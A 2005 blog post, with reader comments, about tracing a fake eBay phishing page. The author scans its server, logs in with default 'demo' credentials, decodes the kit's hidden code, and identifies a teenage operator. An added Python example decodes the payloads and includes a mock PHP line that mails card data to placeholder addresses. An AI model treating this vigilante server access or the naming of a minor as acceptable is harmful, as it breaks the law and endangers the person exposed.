Fishing For Phishers

Came home from watching Madagascar to find a poorly formatted email half-appearing to be from eBay, saying that I had to update my account details.

Gmail, it seemed, had already picked up on the fact that the "Return-Path:" was different to the "From:" field and had removed all the links, but I felt in the mood for a little reverse phishing. Just curious I guess, amazed at the depths some people will sink to and not wanting to imagine the floundering few that may already have been hooked.

First thing was to check the bait, the email source. I found the link, which took me to a page that looked very much like an eBay page, with boxes to enter credit card information and all that. The server IP was in the address, so I decided to give my Linux box a little bit of a workout, running nmap and traceroute on the IP.

I noticed the ssh and ftp ports were open and the address had /~demo/ in it, so I tried the obvious, using PuTTY to ssh to the server, 'demo' as the username and 'demo' as the password. I couldn't believe they would be that stupid, but evidently they were. Seems their fishing boat had a few holes in it.

There was no shell access, but I got in through ftp and had a look around, downloaded all their fake eBay files and thought about either deleting them or editing them, but didn't. I wanted to see how much more information I could gather.

The actual files were encoded using the JavaScript 'unescape' function in an attempt to hide the source code from inquisitive fish like me. However, the very long string of %3C%42%4F%44%59%20%7... is easily decoded with a tool like this. Still following the lure, I ended up at the PHP file that seemed to do the actual sending of the private information to the little phishermen. The mail() commands were in base64, ready to be decoded and executed by the server.

I changed the code a little and put it through my Linux server, making it only echo the base64_decode() output instead of running it. And there I had them, hook, line and sinker, the two email addresses that the credit card details were being reeled into.
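The same two decoding steps done offline, as an added Python example that is not the post's own code: unescape the landing page's percent-encoded HTML, then base64-decode the sender script's payload and read the mail() recipients out of it instead of letting eval() run it. Both kit files and the drop addresses are constructed placeholders.

```python
import base64
import re
from urllib.parse import unquote

# Constructed sample landing page: HTML percent-escaped for JavaScript unescape().
LANDING_PAGE = (
    "document.write(unescape('%3C%42%4F%44%59%3E%3Cform%20action%3D%22"
    "send.php%22%3E%3C%2FBODY%3E'));"
)
# Constructed sample sender: the mail() calls sit in a base64 string that the
# real kit hands to eval(). The addresses are placeholders, not real ones.
HIDDEN_PHP = (
    '$msg = "card=$_POST[cc]";\n'
    'mail("drop-one@example.invalid", "eBay", $msg);\n'
    'mail("drop-two@example.invalid", "eBay", $msg);\n'
)
SEND_PHP = '<?php eval(base64_decode("%s")); ?>' % base64.b64encode(
    HIDDEN_PHP.encode()).decode()

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
UNESCAPE_RE = re.compile(r"unescape\(\s*(['\"])(.*?)\1\s*\)", re.S)
B64_RE = re.compile(r"base64_decode\(\s*(['\"])([A-Za-z0-9+/=\s]+)\1\s*\)")

def js_unescape(s):
    """Mimic JavaScript unescape(): %uXXXX is a UTF-16 unit, %XX a Latin-1 byte."""
    s = re.sub(r"%u([0-9A-Fa-f]{4})", lambda m: chr(int(m.group(1), 16)), s)
    return unquote(s, encoding="latin-1")

def decode_unescape_calls(js):
    """Plaintext of every unescape('...') literal argument found in a script."""
    return [js_unescape(m.group(2)) for m in UNESCAPE_RE.finditer(js)]

def decode_base64_calls(php):
    """Decode every base64_decode('...') literal argument; never evaluates it."""
    out = []
    for m in B64_RE.finditer(php):
        blob = re.sub(r"\s+", "", m.group(2))
        try:
            out.append(base64.b64decode(blob, validate=True).decode("latin-1"))
        except ValueError:  # not valid base64: skip rather than guess
            continue
    return out

def find_drop_addresses(php):
    """Recipient addresses named in mail() calls inside the decoded payloads."""
    calls = re.compile(r"mail\(\s*(['\"])([^'\"]+)\1")
    return sorted({c.group(2) for p in decode_base64_calls(php)
                   for c in calls.finditer(p) if EMAIL_RE.fullmatch(c.group(2))})
```

Only literal string arguments are handled; a kit that builds the base64 blob in a variable first would need the variable assignments resolved before the same decoding applies.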

Googling the names brought up information for only one of the little phishermen, on a music-related message board profile: a sixteen year old Eminem fan from Romania. He even had a picture.

I was satisfied at that. Fish matching wits with phishermen. The one that got away, staring into the eyes of his would-be, puerile captor. Catch you next time.

Fishing at Moonlight, Kunsthistorisches Museum, Vienna


Blogger warrenzone said...

I think I got that same e-mail, I forwarded it to pay-pal. you should post the pic of the kid.

6/19/2005 05:09:00 am  
Anonymous Anonymous said...

its spellt Madagascar

dear or else

6/19/2005 09:56:00 am  
Blogger Joshua said...

Sorry Katty and/or Natty, my own personal spell checkers :) I'll get on that right away.

6/19/2005 07:42:00 pm  
Anonymous Anonymous said...

its spelt spelt. not spellt

dear or else

6/20/2005 02:42:00 pm  
Anonymous Anonymous said...

lol yarr dork

so josh has a spell checker and that spell checker has a spell checker

having 2 spell checkers is the thing of the future!

dear or else

6/20/2005 09:39:00 pm  
Anonymous Anonymous said...

Clever little hunting foray there, I'm with warrenzone, post the little gnat's picture.

6/20/2005 11:34:00 pm  
Blogger Joshua said...

Purposely didn't include any detailed info in this post. Didn't really want to get too personal with these people.

I sent the info on to eBay security, but doubt they'll do anything. Watch for his picture on Romania’s most wanted :)

6/20/2005 11:46:00 pm  
Anonymous Anonymous said...

yarr dork doesnt make sense. yarr is used as "your" or "you're" and "you are dork" doesnt make sense, it'd have to be "yarr a dork" unless, of course, you were saying "yarr" as "you" because we're pirates of the future and we can say "yarr" in any context but no one else can, and if so, then thats ok.

dear or else

6/21/2005 05:31:00 pm  

